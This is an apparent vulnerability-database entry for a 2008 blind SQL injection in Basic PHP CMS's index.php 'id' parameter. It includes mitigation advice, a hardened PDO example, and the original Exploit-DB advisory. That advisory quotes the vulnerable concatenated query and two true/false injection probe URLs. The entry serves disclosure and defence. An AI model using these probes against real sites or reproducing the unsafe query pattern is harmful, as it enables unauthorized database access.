Vendor: Basic PHP CMS
By: CWH Underground
CVSS: 7.5 (HIGH)
Type: Blind SQL Injection
CWE: 89
Product Name: Basic PHP CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability

Basic PHP CMS insufficiently sanitizes user-supplied input in the 'id' parameter of the 'index.php' script. An attacker can exploit this to inject and execute arbitrary SQL commands in the application's back-end database, which can be used to manipulate data, disclose sensitive information, and compromise the application and the underlying system.

Mitigation:

User-supplied input should be validated and properly sanitized before it is used. Additionally, the application should use parameterized queries to prevent SQL injection attacks.
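
The mitigation above applied to the index.php lookup quoted in the raw advisory below, as an added example (not code from Basic PHP CMS or from the advisory). It assumes PDO is available and uses an in-memory SQLite database as a stand-in for the MySQL back end; fetchDescription() is a hypothetical helper name, and the sample row is constructed.

```php
<?php
// Added example: hardened form of the index.php page lookup.
// Assumption: PDO with the SQLite driver; SQLite stands in for MySQL so this runs offline.
// Table and column names (pages_t_details, id, description) are taken from the advisory.

function fetchDescription(PDO $db, $rawId): ?string
{
    // 1. Validate: the id must be a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        // Same result as "no such page", so responses give no true/false signal.
        return null;
    }

    // 2. Parameterize: the value is bound, never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT description FROM pages_t_details WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['description'];
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages_t_details (id INTEGER PRIMARY KEY, description TEXT)');
$db->exec("INSERT INTO pages_t_details (id, description) VALUES (1, 'Welcome page')");

// A legitimate id, followed by the two id values quoted in the advisory.
$inputs = [
    '1',
    '1 and substring(@@version,1,1)=5--',
    '1 and substring(@@version,1,1)=4--',
];

foreach ($inputs as $input) {
    $result = fetchDescription($db, $input);
    printf("%-40s => %s\n", $input, $result === null ? '(no page)' : $result);
}
```

Against MySQL the same function works with a mysql: DSN; setting PDO::ATTR_EMULATE_PREPARES to false makes PDO use server-side prepared statements. Both advisory strings fail integer validation and produce the same "no page" result, so the response no longer differs between the two conditions.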

Exploit-DB raw data:

==================================================================
  Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability
==================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 November 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Basic PHP CMS
 DOWNLOAD    : http://www.content-management-software.us/basiccms.zip
#####################################################

--- Blind SQL Injection ---

-----------------------------
 Vulnerable File (index.php)
-----------------------------

if ($strID != "")
{
	$strsql = "SELECT description ";
	$strsql .=" FROM pages_t_details ";
	$strsql .=" WHERE id=$strID";
	$conclass =new DataBase();
	$rst= $conclass->Execute ($strsql,$strError);
	if ($strError=="")
	{
		while ($line = mysql_fetch_array($rst, MYSQL_ASSOC)) 
	     {
			$strDetails=$line['description'];
		}
	}
	
}

---------
 Exploit
---------

Test Blind SQL Injection in MYSQL Version 5

True
[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=5--

False
[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=4--


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-11-28]